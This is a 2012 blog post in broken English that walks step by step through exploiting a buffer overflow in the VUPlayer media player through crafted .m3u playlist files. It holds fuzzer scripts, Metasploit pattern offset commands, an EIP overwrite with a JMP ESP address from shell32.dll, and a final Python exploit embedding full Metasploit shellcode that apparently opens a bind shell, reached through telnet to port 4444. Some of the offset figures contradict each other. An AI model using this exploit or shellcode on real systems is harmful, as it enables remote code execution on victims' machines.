Daftar Blog Saya

Selasa, 14 Februari 2012

Exploit VUPlayer


Buffer Overflow VUPlayer
A. Try
  1. I try make fuzzer with format file .vpl
#!usr/bin/python
filename="error.vpl"
buffer="\x41" * 1000
file=open(filename,'w')
file.write(buffer)
file.close()

  1. run file python in terminal to make new file
  2. run VUPlayer and load fuzzer with format file .vpl, aplication not crash and try buffer * until 2000 VUPlayer not crash too.
  3. I try make fuzzer with format file .m3u

#!usr/bin/python
filename="error.m3u"
buffer="\x41" * 1000
file=open(filename,'w')
file.write(buffer)
file.close()

  1. run fuzzer in terminal to make new file .m3u.
  2. run VUPlayer and load with fuzzer with format file .m3u same not crash. I try change buffer math 2000 and this show. Aplication be lost on the window.
  3. I try again make fuzzer with format file .pls.

#!usr/bin/python
filename="error.pls"
buffer="\x41" * 1000
file=open(filename,'w')
file.write(buffer)
file.close()


  1. run fuzzer in terminal to make file .pls
  2. run VUPlayaer again and load result fuzzer with format file .pls same not crash. I try change buffer math 2000 and this show. Aplication be lost on the window.
  3. I try again make fuzzer with format .asx

#!usr/bin/python
filename="error.asx”
buffer="\x41" * 1000
file=open(filename,'w')
file.write(buffer)
file.close()

  1. run fuzzer in teminal to make file .asx
  2. run VUPlayer again and load result fuzzer with format file .asx same aplication not crash. I try change buffer math until 2000 but also not crash.
  3. I try again make fuzzer with format .wax.

#!usr/bin/python
filename="error.wax"
buffer="\x41" * 1000
file=open(filename,'w')
file.write(buffer)
file.close()

  1. run fuzzer in terminal to make file.wax
  2. run VUPlayaer again and load result fuzzer with format file .pls same not crash. I try change buffer math 2000 and this show. Aplication be lost on the window.
  3. Make fuzzer with python language the useful make format file .cue.

#!usr/bin/python
filename="error.cue"
buffer="\x41" * 1000
file=open(filename,'w')
file.write(buffer)
file.close()

  1. run fuzzer on terminal to make file .cue
  2. run VUPlayer again and load result fuzzer with format file .asx same aplication not crash. I try change buffer math until 2000 but also not crash.

I try make result this case make way to buffer format file .m3u, .pls, .wax, but I choses format file is .m3u.

B. Show Process Debbugging
  1. run aplication UVPlayer in Ollydbg for see the process and analisys the memory.
  1. make dummies data structur with pattern create
    -open terminal and type the terminal :
    root@bt:~# cd /pentest/exploits/framework/tools/
    root@bt:/pentest/exploits/framework/tools# ./pattern_create.rb 2000 > error.txt

       -type in terminal : #kwrite error.txt
        case talked about the function show dummies string structure.

       -copy and paste value error.txt and modifiying the fuzzer

#!usr/bin/python
filename="error1.m3u"
buffer="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co"
#buffer+="\x41" * 2000
file=open(filename,'w')
file.write(buffer)
file.close()

    • run fuzzer after modification on terminal
    • run UVPlayer on Ollydbg and load fuzzer modification and attention ESP memory and EIP memory.

  1. count byte from pattern collection
    - type on terminal :
    root@bt:/pentest/exploits/framework/tools# ./pattern_offset.rb 68423768
    1012
        in the case, EIP address at UVPlayer can overwrite is 1023,1024,1025    and 1016 because EIP address 4 byte only.
    root@bt:/pentest/exploits/framework/tools# ./pattern_offset.rb 8Bh9Bi
    1016

  1. proof the address EIP
    -modification the fuzzer
    #! usr/bin/python
    filename="error2.m3u"
    buffer="\x90" * 1012
    buffer+="\xEF\xBE\xAD\xDE"
    file=open(filename,'w')
    file.write(buffer)
    file.close()

    • run UVPlayer on Ollydbg and load fuzzer
  1. proof the ESP address
    - modification fuzzer
    #! usr/bin/python
    filename="error3.m3u"
    buffer+="\x90" * 1012
    buffer+="\xEF\xBE\xAD\xDE"
    buffer+="\x90" * (1016-len(buffer))
    buffer+="\xCC" * (2000-len(buffer))
    file=open(filename,'w')
    file.write(buffer)
    file.close()

    • run UVPlayer again on Ollydbg and load the fuzzer
  1. JMP ESP
    1. search JMP ESP
    - run VUPlayer on Ollydbg, click View menu chose menu executable modules. In Executable modules window, I chose with method double click shell32.dll. Show new window shell32.dll and click right main window → search for -->Command and type JMP ESP then press Find buttom.

  1. proof JMP ESP
    - modification fuzzer

#! usr/bin/python
filename="error4.m3u"
buffer="\x90" * 1012
buffer+="\xD7\x30\x9D\x7C"
buffer+="\xCC" * (1016-len(buffer))
buffer+="\xCC" * (2000-len(buffer))
file=open(filename,'w')
file.write(buffer)
file.close()

    • run aplication on Ollydbg and load fuzzer after modification

  1. Payload
    1. make payload
    - run metasploit2 GUI in terminal, type :
    root@bt:~# cd /pentest/exploits/framework2/
    root@bt:/pentest/exploits/framework2# ./msfweb
    +----=[ Metasploit Framework Web Interface (127.0.0.1:55555)

    • open web broser and type :localhost:55555
    • filter modules payload
    • chose payload modules
    • generate payload

  1. modification fuzzer
    - copy and paste result generate payload from msfweb
    #! usr/bin/python
    filename="error5.m3u"
    buffer="\x90" * 1012
    buffer+="\xD7\x30\x9D\x7C"
    buffer+="\x90" * 32
    buffer+=("\xda\xd8\xbf\x29\xf7\x72\x58\x31\xc9\xd9\x74\x24\xf4\x58\xb1\x51"
    "\x83\xc0\x04\x31\x78\x13\x03\x51\xe4\x90\xad\x5d\x60\xbe\x03\x75"
    "\x8c\xbf\x63\x7a\x0f\xcb\xf0\xa0\xf4\x40\x4d\x94\x7f\x2a\x4b\x9c"
    "\x7e\x3c\xd8\x13\x99\x49\x80\x8b\x98\xa6\x76\x40\xae\xb3\x88\xb8"
    "\xfe\x03\x13\xe8\x85\x44\x50\xf7\x44\x8e\x94\xf6\x84\xe4\x53\xc3"
    "\x5c\xdf\xb3\x46\xb8\x94\x9b\x8c\x43\x40\x45\x47\x4f\xdd\x01\x08"
    "\x4c\xe0\xfe\xb5\x40\x69\x89\xd5\xbc\x71\xeb\xe6\x8c\x52\x8f\x63"
    "\xad\x54\xdb\x33\x3e\x1e\xab\xaf\x93\xab\x0c\xc7\xb5\xc3\x02\x99"
    "\x47\xf8\x4b\xda\x8e\x66\x3f\x42\x47\x54\x8d\xe2\xe0\xe9\xc3\xad"
    "\x5a\xf1\xf4\x39\xa8\xe0\x09\x82\x7e\x04\x27\xab\xf7\x1f\xae\xd2"
    "\xe5\xe8\x2d\x81\x9f\xea\xce\xf9\x08\x32\x39\x0c\x65\x93\xc5\x38"
    "\x25\x4f\x69\x97\x99\x2c\xde\x54\x4d\x4c\x30\x3c\x19\xa3\xed\xa6"
    "\x8a\x4a\xec\xb3\x45\xe9\xf5\xcb\x52\xa6\xf6\xfd\x37\x59\x58\x54"
    "\x37\x89\x32\xf2\x6a\x04\x2a\xad\x8b\x8f\xff\x04\x8b\xe0\x68\x43"
    "\x3a\x87\x20\xdc\x42\x51\xe2\xb6\xe8\x0b\xfc\xe6\x82\xdc\xe5\x7f"
    "\x63\x65\xbd\x80\xbd\xc3\xbe\xae\x24\x86\x24\x28\xc1\x35\xc8\x3d"
    "\xf4\xd0\x42\x64\xde\xe8\xea\x71\x4a\xb5\x65\x9f\xba\xf5\x85\xf5"
    "\x43\xb7\x44\xf7\xfe\x14\x04\x8a\x85\x5c\x81\x3f\xd2\xf5\xa7\xc1"
    "\x96\x10\xb7\x48\x9d\xe3\x91\xe9\x4a\x4e\x4f\x5c\x24\x04\x6e\x0f"
    "\x97\x8d\x21\x50\xc7\x46\x6f\x77\xed\x58\x3c\x78\x38\x0e\x3c\x79"
    "\xf2\x30\x12\x0e\xaa\x32\x10\xd4\x31\x34\xc1\x86\x46\x1a\x86\x58"
    "\x61\x79\x24\xf7\x6e\xa8\x34\x27")
    file=open(filename,'w')
    file.write(buffer)
    file.close()

  • run VUPlayer not Ollydbg and load fuzzer
  • run terminal on backtrack and connection, type :
    root@bt:~# telnet 192.168.56.101 4444

======GOOD LUCK========

Tidak ada komentar:

Posting Komentar